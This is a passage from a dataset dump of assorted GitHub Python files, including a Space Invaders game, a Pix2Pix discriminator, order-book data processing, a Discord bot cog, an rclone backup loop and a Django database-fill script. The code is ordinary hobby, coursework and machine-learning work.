test_can_num}\n outvec_h_match = sess.run(\n output_h_match, feed_dict=feeddict_test)\n if j == 0:\n outvec_h_match_all = outvec_h_match.reshape((2, -1, dimension+dimension_g))\n else:\n outvec_h_match_all = np.concatenate(\n [outvec_h_match_all, outvec_h_match.reshape((2, -1, dimension+dimension_g))], axis=1)\n get_hits_new(outvec_h_match_all, test_can, test, test_can_num)\n\n if i >= pre_epochs and i % 50 == 49:\n print('train sample w')\n for _ in range(10):\n select_train = np.random.choice(len(ILL), 10)\n feeddict[\"select_train:0\"] = select_train\n for j in range(5):\n _, thw = sess.run([train_step_w, loss_w],\n feed_dict=feeddict)\n print(thw)\n sample_w_vec = sess.run(sample_w, feed_dict=feeddict)\n\n sess.close()\n return outvec, J\n","repo_name":"StephanieWyt/NMN","sub_path":"include/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":20692,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"19"} +{"seq_id":"4039000477","text":"# space invaders\nimport turtle\nimport os\nimport math\nimport random\nimport winsound\n#setup screen and graphics\nwn = turtle.Screen()\nwn.bgcolor(\"black\")\nwn.title(\"Space Invaders\")\nwn.bgpic(\"space_invaders_background.gif\")\n\nturtle.register_shape(\"invader.gif\")\nturtle.register_shape(\"player.gif\")\n#draw border\nborder_pen=turtle.Turtle()\nborder_pen.speed(0)\nborder_pen.color(\"white\")\nborder_pen.penup()\nborder_pen.setposition(-300,-300)\nborder_pen.pendown()\nborder_pen.pensize(3)\nfor side in range(4):\n\tborder_pen.fd(600)\n\tborder_pen.lt(90)\nborder_pen.hideturtle()\n\n#Set the score to 0\nscore = 0\n\n#Draw the score\nscore_pen = turtle.Turtle()\nscore_pen.speed(0)\nscore_pen.color(\"white\")\nscore_pen.penup()\nscore_pen.setposition(-290, 280)\nscorestring = \"Score: %s\" %score\nscore_pen.write(scorestring, False, align=\"left\", font=(\"Arial\", 14, \"normal\"))\nscore_pen.hideturtle()\n\n# creat player turtal\nplayer = turtle.Turtle()\nplayer.color(\"blue\")\nplayer.shape(\"player.gif\")\nplayer.penup()\nplayer.speed(0)\nplayer.setposition(0, -250)\nplayer.setheading(90)\n\n# move player left and right\nPlayerspeed = 15 \ndef move_left():\n x = player.xcor()\n x -= Playerspeed\n if x < -280 :\n \tx = -280\n player.setx(x)\n\ndef move_right():\n x = player.xcor()\n x += Playerspeed\n if x > 280 :\n \tx = 280\n player.setx(x)\n# graphics audio\ndef laser():\n winsound.PlaySound(\"laser.wav\", winsound.SND_ASYNC)\ndef explosion():\n winsound.PlaySound(\"explosion.wav\", winsound.SND_ASYNC)\n\n#firw fn \ndef fire():\n\tglobal bulletstate\n\tif bulletstate==\"ready\":\n\t\tlaser()\n\t\tbulletstate=\"fire\"\n\t\tx=player.xcor()\n\t\ty=player.ycor() + 10\n\t\tbullet.setposition(x,y)\n\t\tbullet.showturtle()\n\n\n\n\n\n#creat keyword blindings\nturtle.listen()\nturtle.onkey(move_left,\"Left\")\nturtle.onkey(move_right,\"Right\")\nturtle.onkey(fire,\"space\")\n\nnumber_of_enemis=5\nenemies=[]\nfor i in range(number_of_enemis):\n\tenemies.append(turtle.Turtle())\n#creat the enemy\nfor enemy in enemies:\n\tenemy.color(\"red\")\n\tenemy.shape(\"invader.gif\")\n\tenemy.penup()\n\tenemy.speed(0)\n\tx = random.randint(-200, 200)\n\ty = random.randint(100, 250)\n\tenemy.setposition(x,y)\nenemyspeed = 4\n\n# define bullet state\n#bullet ready to fire \n#bullet is firing\n# creat wepon\nbullet=turtle.Turtle()\nbullet.shape(\"triangle\")\nbullet.color(\"yellow\")\nbullet.speed(0)\nbullet.penup()\nbullet.setheading(90)\nbullet.shapesize(0.5,0.5)\nbullet.hideturtle()\nbulletspeed=20\nbulletstate=\"ready\"\n\n# if collision\n\ndef iscollision(t1,t2):\n\tdistance = math.sqrt(math.pow(t1.xcor()-t2.xcor(),2)+math.pow(t1.ycor()-t2.ycor(),2))\n\tif distance<15:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\n# Game over !\nfinish=turtle.Turtle()\nfinish.hideturtle()\nfinish.shape(\"triangle\")\nfinish.color(\"red\")\n\n# main game loop\nwhile True:\n\tfor enemy in enemies:\n\t\t\n\t\t#move enemy\n\t\tx = enemy.xcor()\n\t\tx += enemyspeed\n\t\tenemy.setx(x)\n\t\t#move enemy down and back\n\t\tif x > 280:\n\t\t\tfor enemy in enemies:\n\t\t\t\ty = enemy.ycor()\n\t\t\t\ty-=40\n\t\t\t\tenemy.sety(y)\n\t\t\tenemyspeed *= -1\n\n\t\telif x < -280:\n\t\t\tfor enemy in enemies:\n\t\t\t\ty = enemy.ycor()\n\t\t\t\ty -= 40\n\t\t\t\tenemy.sety(y)\n\t\t\tenemyspeed *= -1\n\t\tif enemy.ycor()< -300:\n\t\t\tenemy.sety(280)\n\t# check for collision\n\t\tif iscollision(bullet,enemy):\n\t\t\texplosion()\n\t\t\tbullet.hideturtle()\n\t\t\tbulletstate=\"ready\"\n\t\t\tbullet.setposition(0, -400)\n\t\t\tx = random.randint(-200, 200)\n\t\t\ty = random.randint(100, 250)\n\t\t\tenemy.setposition(x,y)\n\t\t\tscore+=10\n\t\t\tscorestring = \"Score: %s\" %score\n\t\t\tscore_pen.clear()\n\t\t\tscore_pen.write(scorestring, False, align=\"left\", font=(\"Arial\", 14, \"normal\"))\n\t\t\tscore_pen.hideturtle()\n\n\n\t\tif iscollision(enemy,player):\n\t\t\tplayer.hideturtle()\n\t\t\tenemy.hideturtle()\n\t\t\tfinish.write(\"Game Over !\",align=\"center\", font=(\"Arial\", 16, \"normal\"))\n\t\t\tbreak\n\n\t# move the bullet (fire)\n\tif bulletstate==\"fire\":\n\t\ty=bullet.ycor()\n\t\ty+=bulletspeed\n\t\tbullet.sety(y)\n\n\t#check of bullet in the top\n\tif bullet.ycor() > 275:\n\t\tbullet.hideturtle()\n\t\tbulletstate=\"ready\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwn.mainloop()","repo_name":"MostafaSamyFayez/Space-Invader-Game-Python","sub_path":"Space_invader_game.py","file_name":"Space_invader_game.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23105252328","text":"import sys\ninput = sys.stdin.readline\n\n\ndef find(node):\n # path compression 기법\n if parent[node] != node:\n parent[node] = find(parent[node])\n return parent[node]\n\n\ndef union(node_1, node_2):\n root_1 = find(node_1)\n root_2 = find(node_2)\n\n parent[root_1] = root_2\n\n\n# G(게이트 수), P(비행기 수)\ng = int(input())\np = int(input())\nparent = [i for i in range(g+1)]\n\ncnt = 0\nfor plane in range(1, p+1):\n g_range = int(input())\n plane_parent = find(g_range)\n if plane_parent == 0:\n break\n union(plane_parent, plane_parent-1)\n cnt += 1\n\nprint(cnt)\n","repo_name":"dudupeng3105/algorithm","sub_path":"baekjoon/BJ_10775.py","file_name":"BJ_10775.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41853269199","text":"import discord\nfrom discord.ext import commands\n\n\nclass Dev(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"load\")\n @commands.is_owner()\n async def _load(self, ctx, *args):\n for arg in args:\n self.bot.load_extension(arg)\n await ctx.send(f\"{ctx.author.mention}: Loaded {list(args)} ! :3c\", delete_after=3)\n\n @commands.command(name=\"reload\")\n @commands.is_owner()\n async def _reload(self, ctx, *args):\n for arg in args:\n self.bot.reload_extension(arg)\n await ctx.send(f\"{ctx.author.mention}: Reloaded {list(args)} ! :3c\", delete_after=3)\n\n @commands.command(name=\"reload_all\")\n @commands.is_owner()\n async def _reload_all(self, ctx):\n exts = list(self.bot.extensions.keys())\n for ext in exts:\n self.bot.reload_extension(ext)\n await ctx.send(f\"{ctx.author.mention}: Reloaded all extensions!\", delete_after=3)\n\n\ndef setup(bot):\n bot.add_cog(Dev(bot))\n","repo_name":"Sheinxy/Snaky","sub_path":"cogs/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38511224052","text":"import time\nimport os\ndata=os.getenv(\"RCLONE_DATA\")\napp_name=os.getenv(\"APP_NAME\")\n#Config File\nos.system(f'echo {data} | base64 -d > /home/coder/.config/rclone/rclone.conf')\nprint('config File Created')\n#Download\nos.system(f'rclone sync test:{app_name} ~/project/')\nprint('files Synced')\n#upload Every 1 min\nwhile True:\n os.system(f'rclone sync ~/project/ test:{app_name}')\n print('Files Uploaded')\n time.sleep(60)\n","repo_name":"charan200415/vscode","sub_path":"deploy-container/persiststorage.py","file_name":"persiststorage.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27295430282","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import patches, lines\nfrom canvas.canvas2d import canvas2D\nfrom text.text import TextAnim\nimport matplotlib.patheffects as path_effects\n\n\nclass ErrorEquation(canvas2D):\n canvframes = 105\n def __init__(self, theme='dark'):\n super().__init__(size_xy=(8,80), frames=self.canvframes, atype='l',\n everyx=1, everyy=10, grid=False, theme=theme, xticklabels=np.arange(0,9), \n yticklabels=np.arange(10,90,10))\n # colors for dark bg\n if theme=='dark':\n self.data_color = '#20ad9d'\n self.funct_color = '#FBEB30'\n self.error_color = '#e50b0b'\n # colors for transparent versions\n elif theme=='light':\n self.data_color = '#3c8c48'\n self.funct_color = '#c43838'\n # configure event to listen to\n self.cid = self.fig.canvas.mpl_connect('key_press_event', self.key_press)\n # scattered values\n self.x = np.arange(1,7)\n self.y = np.array([18, 15, 35, 30, 54, 45])\n # wrong line\n self.X = np.arange(1, 8)\n self.Y = np.arange(10, 80, 10)\n # figures\n self.line = lines.Line2D([0], [0], color=self.funct_color)\n self.rect_1 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_2 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_3 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_4 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_5 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n self.rect_6 = patches.Rectangle((0,0), 0, 0, alpha=0.2, color=self.error_color)\n\n def show_text(self, text):\n text = self.ax.text(s=text, transform=plt.gcf().transFigure,\n x=.2, y=.85, color='w', ha='center', va='center',\n fontsize=40)\n # color edges of text\n text.set_path_effects([path_effects.Stroke(linewidth=5, foreground='black'),\n path_effects.Normal()])\n\n def last_eg(self):\n # scatter\n self.ax.scatter(self.x,self.y, s=50, alpha=1, color=self.data_color, marker='+')\n self.line.set_data(self.X, self.Y)\n self.ax.add_line(self.line)\n return self.line,\n\n def distances_anim(self, i):\n for txt in self.ax.texts:\n txt.set_visible(False)\n if i>10:\n i=10\n self.ax.text(s=r'$\\{$',\n x=self.X[0]-.45, y=self.Y[0]+1.5, color='white', visible=True,\n fontsize=50*i/(10), alpha=i/(10))\n self.ax.text(s=r'$\\{$',\n x=self.X[1]-.3, y=self.Y[1]-5, color='white', visible=True,\n fontsize=30*i/(10), alpha=i/(10))\n self.ax.text(s=r'$\\{$',\n x=self.X[2]-.3, y=self.Y[2]+1, color='white', visible=True,\n fontsize=30*i/(10), alpha=i/(10))\n self.ax.text(s=r'{',\n x=self.X[3]-.5, y=self.Y[3]-8, color='white', visible=True,\n fontsize=55*i/(10), alpha=i/(10))\n self.ax.text(s=r'{',\n x=self.X[4]-.2, y=self.Y[4]+1, color='white', visible=True,\n fontsize=25*i/(10), alpha=i/(10))\n self.ax.text(s=r'{',\n x=self.X[5]-.8, y=self.Y[5]-13, color='white', visible=True,\n fontsize=92*i/(10), alpha=i/(10))\n\n return self.ax,\n\n def animate_distances(self, f):\n anim = animation.FuncAnimation(self.fig, self.distances_anim, interval=40, \n frames=f, blit=False, repeat=False)\n \n # anim.save('e1.mp4',codec='png', fps=25,\n # dpi=200, bitrate=100, savefig_kwargs={'facecolor': self.bg_color})\n \n plt.show()\n\n def diffs_anim(self, i):\n for txt in self.ax.texts:\n txt.set_visible(False)\n if i==0:\n self.ax.add_patch(self.rect_1)\n self.ax.add_patch(self.rect_2)\n self.ax.add_patch(self.rect_3)\n self.ax.add_patch(self.rect_4)\n self.ax.add_patch(self.rect_5)\n self.ax.add_patch(self.rect_6)\n i = int(i/2)\n if i>10:\n i=10\n # draw difference ============\n diff = self.Y[:6]-self.y \n # square distance\n w = (diff[0]/10)*i\n self.rect_1.set_xy((self.x[0], self.y[0]))\n self.rect_1.set_height(diff[0])\n self.rect_1.set_width(w/10)\n\n w = (diff[1]/10)*i\n self.rect_2.set_xy((self.x[1], self.y[1]))\n self.rect_2.set_height(diff[1])\n self.rect_2.set_width(w/10)\n\n w = (diff[2]/10)*i\n self.rect_3.set_xy((self.x[2], self.y[2]))\n self.rect_3.set_height(diff[2])\n self.rect_3.set_width(w/10)\n\n w = (diff[3]/10)*i\n self.rect_4.set_xy((self.x[3], self.y[3]))\n self.rect_4.set_height(diff[3])\n self.rect_4.set_width(w/10)\n \n w = (diff[4]/10)*i\n self.rect_5.set_xy((self.x[4], self.y[4]))\n self.rect_5.set_height(diff[4])\n self.rect_5.set_width(w/10)\n\n w = (diff[5]/10)*i\n self.rect_6.set_xy((self.x[5], self.y[5]))\n self.rect_6.set_height(diff[5])\n self.rect_6.set_width(w/10)\n\n return self.rect_1,self.rect_2,self.rect_3,self.rect_4,self.rect_5,self.rect_6,self.ax\n\n def animate_diffs(self, f):\n anim = animation.FuncAnimation(self.fig, self.diffs_anim, interval=40, \n frames=f, blit=False, repeat=False)\n \n # anim.save('e2.mp4',codec='png', fps=25,\n # dpi=200, bitrate=100, savefig_kwargs={'facecolor': self.bg_color})\n \n plt.show()\n\n def error_anim(self, i):\n for txt in self.ax.texts:\n txt.set_visible(False)\n if i>=10:\n i=10\n error = self.Y[:6] - self.y\n error = round(sum(error**2),2)\n self.ax.text(s='Error = {}.00'.format(str(error)), fontproperties=self.prop,\n x=4, y=10, color=self.error_color,\n fontsize=50, alpha=i/10)\n\n return self.ax,\n\n def animate_error(self, f):\n anim = animation.FuncAnimation(self.fig, self.error_anim, interval=40, \n frames=None, blit=False, repeat=False)\n\n # anim.save('e3.mp4',codec='png', fps=25,\n # dpi=200, bitrate=100, savefig_kwargs={'facecolor': self.bg_color})\n\n plt.show()\n\n def key_press(self, event):\n if event.key == 'i':\n # Save Image with background\n plt.savefig('error_img.png', dpi=None, facecolor=self.bg_color)\n # reset\n elif event.key == '0':\n plt.cla()\n plt.xticks(ticks=[], labels='')\n plt.yticks(ticks=[], labels='')\n self.ax.spines['left'].set_color('none')\n self.ax.spines['bottom'].set_color('none')\n # show x-y axes with x with Ceres values\n elif event.key=='1':\n # self.animate_axes()\n self.static_canvas()\n elif event.key=='2':\n self.last_eg()\n # draw line with x\n elif event.key=='3':\n self.animate_distances(100)\n # move line with m\n elif event.key=='4':\n self.animate_diffs(100)\n # move line with b\n elif event.key=='5':\n self.animate_error(50)\n\n plt.show()\n\ndef main():\n # Hide toolbar from window\n mpl.rcParams['toolbar'] = 'None'\n # mpl.rc('text', usetext=True)\n # Initiate class\n ls = ErrorEquation(theme='dark')\n\n # Configure position of graph in canvas\n plt.subplots_adjust(left=.5, bottom=.2, right=.9, top=.8, wspace=.20, hspace=.20)\n # Full page\n # plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=.20, hspace=.20)\n\n # showtime\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jabud/math_animations","sub_path":"linear_regression/error_equation.py","file_name":"error_equation.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71698891242","text":"import pandas as pd\nimport json\nfrom tqdm import tqdm\nimport numpy as np\nimport gc \n\n# @Author : Isaac YANG ZICHUN \n# @Stu_ID: 2009705\n# @Email : cm20952@bristol.ac.uk\n# @File : dataProcessing.py\n# @Interpreter: Python 3.7 on Google Colab\n# @Desc: this python file is used for data cleaning, data processing\n\n\ndef price_values(dataList):\n \"\"\"\n 1.To get all prices of LOB.txt in one day\n e.g. ask: [234,1], [232,2], [231,3]... ---Processing---> [234,232,231...]\n \n 2.To get the Maximum, Minimum, Mean, Variance and Standard Deviation of it.\n return: [Maximum, Minimum, Mean, Variance, Standard Deviation]\n \"\"\"\n dataList = np.array(dataList)\n if len(dataList)>0:\n maxValue = dataList[0][0]\n minValue = dataList[-1][0]\n meanValue = np.mean(dataList[:,0])\n medianValue = np.median(dataList[:,0])\n stdValue = np.std(dataList[:,0])\n return [maxValue, minValue,meanValue,medianValue,stdValue]\n else:\n return None,None,None,None,None\n\ndef amount_values(dataList):\n \"\"\"\n 1. To get all amount of LOB.txt in one day\n e.g. ask:[[234,1],[232,2],[231,3]] ---Processing---> [1, 2, 3...]\n \n 2.To get the Maximum, Minimum, Mean, Median and Standard Deviation of it.\n return: [Maximum, Minimum, Mean, Median, Standard Deviation]\n \"\"\"\n dataList = np.array(dataList)\n if len(dataList)>0:\n maxValue = np.max(dataList[:,1])\n minValue = np.min(dataList[:,1])\n meanValue = np.mean(dataList[:,1])\n medianValue = np.median(dataList[:,1])\n stdValue = np.std(dataList[:,1])\n return [maxValue, minValue,meanValue,medianValue,stdValue]\n else:\n return None,None,None,None,None\n\ndef combine_price_amount_values(dataList):\n \"\"\"\n 1. To get combination of prices and amounts of LOB.txt in one day\n e.g. ask:[[234,1],[232,2],[231,3]] ---Processing---> [234,232,232,231,231,231]\n \n 2.To get the Maximum, Minimum, Mean, Median and Standard Deviation of it.\n return: [Maximum, Minimum, Mean, Median, Standard Deviation]\n \"\"\"\n if len(dataList)>1:\n tmp = []\n for i in dataList:\n tmp+=[i[0]]*i[1]\n dataList = np.array(tmp)\n if len(dataList)>1:\n maxValue = dataList[0]\n minValue = dataList[-1]\n meanValue = np.mean(dataList)\n medianValue = np.median(dataList)\n stdValue = np.std(dataList)\n return maxValue, minValue,meanValue,medianValue,stdValue\n else:\n return None,None,None,None,None\n\ndef mark_diff(x):\n \"\"\"\n Gets the label value.\n For example, \n ... ... ...\n 09:31:01 $250 0\n 09:31:02 $251 1 #Comparing to 9:31:01, $251>$250, so label is 1\n 09:31:03 $230 0 #Comparing to 9:31:02, $230<$250, so label is 0\n 1 represents rising and 0 represents falling\n return: 1/0\n \"\"\"\n if x>0:\n return 1\n elif x<=0:\n return 0\n else:\n return 0\n\ndef get_data(fileName,interval):\n \"\"\"\n To extract original data to be targeted\n First 10 columns are features with the 11th column is label, the 12th column is date.\n Params: \n fileName: LOB path and Tapes path\n interval: Given a time interval to pick up data from huge data, this can be modified based on computing capacity\n I give it to be 5 as default, normally every running time is 4 hours to complete on Google Colab free account.\n The larger interval is, the running time will be more.\n return: a dataframe -> 126\t5\t79.4\t 105\t 44.38400613\t 146\t 677\t 277.0384615\t 155\t 194.0621393\t0\t TstB02_2022-03-16\n 144\t24\t109.8863636\t128\t 35.59763521\t 145\t 656\t 258.25\t 167\t 184.0076048\t1\t TstB02_2022-03-16\n 142\t11\t117.0185185\t133.5\t33.38800558\t 147\t 788\t 372.6415094\t 192\t 237.6046418\t1\t TstB02_2022-03-16\n ...\n ...\n ...\n \"\"\"\n tapesPath = './DataSet_B02/%stapes.csv'%(fileName)\n LOBPath = './DataSet_B02/%sLOBs.txt'%(fileName)\n tapes = pd.read_csv(tapesPath,header=None)\n tapes.rename(columns={0:'date',1:'stock',2:'time',3:'price'},inplace=True)\n with open(LOBPath) as f:\n lob = f.readlines()\n times = []\n bid = []\n ask = []\n # get bid and ask price e.g. [\"time\", 1.258, [\"bid\", [[220, 4]]], [\"ask\", [[328, 3], [800, 1]]]]\n for i in lob:\n lobdata = json.loads(i)\n times.append(lobdata[1]) # [1.258,]\n bid.append(lobdata[2][1]) # [[220,4],...]\n ask.append(lobdata[3][1]) # [[328,3],[800,1]]\n totalData = pd.DataFrame({'times':times,'bid':bid,'ask':ask}) \n \n \"\"\"\n e.g. totalData is :\n \n times bid ask\n 0 881.195 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 1 881.212 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 2 881.229 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 3 881.246 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n 4 881.263 [[267, 2], [259, 3], [258, 2], [257, 2], [256,... [[269, 1], [273, 4], [275, 3], [276, 1], [278,... \n \n \"\"\"\n del times,bid,ask,lob\n gc.collect() #clean memory\n \n \n # Filter data according to interval given, because data is too huge, every running process will cost much time\n def get_most_close_value(x):\n index = (np.abs(totalData['times']-x)).argmin()\n return totalData['times'][index]\n v = pd.DataFrame({'tmpTimes':np.arange(1,totalData['times'].max(),interval)})\n v['times'] = v['tmpTimes'].apply(get_most_close_value)\n \"\"\" \n If interval is 5(default given): [tmpTimes] is a reference No. to cut the data\n V['tmpTimes']:\n tmpTimes \n 0 1.0 \n 1 6.0 \n 2 11.0 \n 3 16.0 \n 4 21.0 \n 5 26.0 \n 6 31.0 \n \"\"\"\n mergedData = pd.merge(v,totalData,how='left',on=['times'])\n del totalData\n gc.collect()\n print('7')\n \n def getTapPrice(times):\n try:\n price = tapes[tapes['time']<=times]['price'].values[-1]\n except:\n price =None\n return price\n \n mergedData['price'] = mergedData['times'].apply(getTapPrice)\n del tapes\n gc.collect()\n print('9')\n \n # Combine processed data \n mergedData['x_bid'] = mergedData['bid'].apply(lambda x :combine_price_amount_values(x))\n mergedData['x_ask'] = mergedData['ask'].apply(lambda x :combine_price_amount_values(x))\n mergedData['x'] = mergedData['x_bid'] + mergedData['x_ask']\n\n a = [i for i in mergedData['price'][1:].values - mergedData['price'][:-1].values]\n a.append(np.NAN)\n mergedData['diff'] = a\n mergedData['diff'] = mergedData['diff'].apply(lambda x :mark_diff(x))\n mergedData['date'] = [fileName]*len(mergedData)\n return mergedData\n \nimport os\nfiles = list(set([i[0:17] for i in os.listdir('./DataSet_B02') if i[0:17] !='.ipynb_checkpoint']))\n\n# System Entrance\nfor file in tqdm(files):\n if file != 'TstB02_2022-01-14':\n data = get_data(file,5)\n targetData = pd.DataFrame(np.array([i for i in data['x'].values]))\n targetData['y'] = data['diff']\n targetData['date'] = data['date']\n targetData.to_csv('data.csv',mode='a',index=None,header=None)\n\n\"\"\"\nexample of processed data:\nColumn 1-10 are features\nColumn 11 is Label\nColumn 1-5 are Maximum Minimum Mean Median Std of Bid in each time point\nColumn 6-10 are Maximum Minimum Mean Median Std of Ask in each time point\n\n126\t5\t79.4\t 105\t 44.38400613\t 146\t 677\t 277.0384615\t155\t194.0621393\t 0\tTstB02_2022-03-16\n144\t24\t109.8863636\t128\t 35.59763521\t 145\t 656\t 258.25\t167\t184.0076048\t 1\tTstB02_2022-03-16\n142\t11\t117.0185185\t133.5\t33.38800558\t 147\t 788\t 372.6415094\t192\t237.6046418\t 1\tTstB02_2022-03-16\n149\t61\t133.9787234\t141\t 22.96203097\t 163\t 785\t 367.8723404\t242\t222.722766\t 1\tTstB02_2022-03-16\n152\t36\t131.8113208\t145\t 29.56352712\t 156\t 770\t 353.5555556\t315\t207.7376075\t 0\tTstB02_2022-03-16\n\"\"\"","repo_name":"chloe-wenqi/MiniProject","sub_path":"Isaac YangZichun/Stage1_DataProcess.py","file_name":"Stage1_DataProcess.py","file_ext":"py","file_size_in_byte":8564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41356240681","text":"\"\"\"\n输入s[n],输出a[n],a[j] = avg(s[1..n])\n\"\"\"\n\nimport sys \nsys.path.append(r'E:\\WeiYun\\CodeVersion\\CodeSample\\Practice-Python\\JupyterNoteBook\\Temp & Test')\nimport decorators\n\n@decorators.timer\ndef prefix_average_1(s):\n a = [0] * len(s)\n for i in range(len(s)):\n total = 0\n for j in range(i + 1):\n total += s[j]\n a[i] = total/(i + 1)\n return a\n\n@decorators.timer\ndef prefix_average_2(s):\n a = [0] * len(s)\n total = 0\n for i in range(len(s)):\n total += s[i]\n a[i] = total/(i + 1)\n return a\n\n\nif __name__ == \"__main__\":\n nums = [i for i in range(1000)]\n # print(prefix_average_1(nums))\n # print(prefix_average_2(nums))\n \n prefix_average_1(nums)\n prefix_average_2(nums)","repo_name":"Vincent-233/Algorithms-Practice-Python","sub_path":"Chapter02-面向对象编程/Code/prefix_avg.py","file_name":"prefix_avg.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"19463777904","text":"from tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.initializers import RandomNormal\r\nfrom keras.models import Model,Input\r\nfrom tensorflow.keras.layers import Conv2D,LeakyReLU,Activation,Concatenate,BatchNormalization\r\nfrom keras.utils.vis_utils import plot_model\r\n\r\nimport os\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\r\n\r\ndef build_discriminator(image_shape):\r\n\tweight_init=RandomNormal(stddev=0.02)\r\n\r\n\tinput_source_image=Input(shape=image_shape)\r\n\r\n\tinput_target_image=Input(shape=image_shape)\r\n\r\n\t#concatenate\r\n\tmerge=Concatenate()([input_source_image,input_target_image])\r\n\t#C64 #Layer 1 doesnt have BN layer\r\n\tdisc=Conv2D(64,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(merge)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\r\n\t#C128\r\n\tdisc=Conv2D(128,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\t#C256\r\n\tdisc=Conv2D(256,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\t#C512\r\n\tdisc=Conv2D(512,(4,4),strides=(2,2),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\r\n\r\n\t#second last output layer\r\n\tdisc=Conv2D(512,(4,4),padding='same',kernel_initializer=weight_init)(disc)\r\n\tdisc=BatchNormalization()(disc)\r\n\tdisc=LeakyReLU(alpha=0.2)(disc)\r\n\r\n\t#outputlayer\r\n\tdisc=Conv2D(1,(4,4),padding='same',kernel_initializer=weight_init)(disc)\r\n\tpatch_output=Activation('sigmoid')(disc)\r\n\r\n\tmodel=Model([input_source_image,input_target_image],patch_output)\r\n\t#adam according to paper\r\n\toptimizer=Adam(lr=0.0002,beta_1=0.5,beta_2=0.999)\r\n\r\n\tmodel.compile(loss='binary_crossentropy',optimizer=optimizer,loss_weights=[0.5])\r\n\treturn model\r\n\r\nif __name__=='__main__':\r\n\timage_shape=(256,256,3)\r\n\r\n\tmodel=build_discriminator(image_shape)\r\n\r\n\tmodel.summary()\r\n\tplot_model(model,to_file='patch_gan_discriminator.png',show_shapes=True,show_layer_names=True)\r\n\r\n","repo_name":"rishabkr/Pix2Pix_GAN_Image_Translation","sub_path":"Pix2Pix_GAN_for_image_translation/patch_gan.py","file_name":"patch_gan.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"38998011740","text":"\"\"\"Clear and fill the database.\"\"\"\n\nimport string\nfrom django.db import transaction, IntegrityError\n\nfrom product.models import (\n Product,\n Categories,\n NutriscoreGrades,\n Brands,\n CodesProductsOff,\n)\n\n\ndef deletedata():\n \"\"\"Clear datas from Product tables and associates (not Users).\"\"\"\n Product.objects.all().delete()\n Categories.objects.all().delete()\n NutriscoreGrades.objects.all().delete()\n Brands.objects.all().delete()\n CodesProductsOff.objects.all().delete()\n\n\ndef insertdb(Api_data):\n \"\"\"Use Django Orm to fill database.\"\"\"\n # Fill Nutriscoregrades table\n grades = list(string.ascii_lowercase[0:4])\n i = 1\n for grade in grades:\n NutriscoreGrades.objects.get_or_create(pk=i, nutriscore_grade=grade)\n i += 1\n\n # Fill Product table and others\n count = 0\n product_count = 0\n for product in Api_data:\n try:\n with transaction.atomic():\n Brands_instance = Brands.objects.get_or_create(\n brand=product[\"brands\"],\n )\n Categories_instance = Categories.objects.get_or_create(\n category=product[\"categories\"],\n )\n CodesProductsOff_instance = CodesProductsOff.objects.get_or_create(\n code=product[\"code\"],\n )\n NutriscoreGrades_instance = NutriscoreGrades.objects.get_or_create(\n nutriscore_grade=product[\"nutriscore_grade\"],\n )\n Product_instance = Product.objects.get_or_create(\n product_name_fr=product[\"product_name_fr\"],\n generic_name_fr=product[\"generic_name_fr\"],\n fat_100g=product[\"fat_100g\"],\n saturated_fat_100g=product[\"saturated-fat_100g\"],\n salt_100g=product[\"salt_100g\"],\n sugars_100g=product[\"sugars_100g\"],\n url=product[\"url\"],\n image_url=product[\"image_url\"],\n 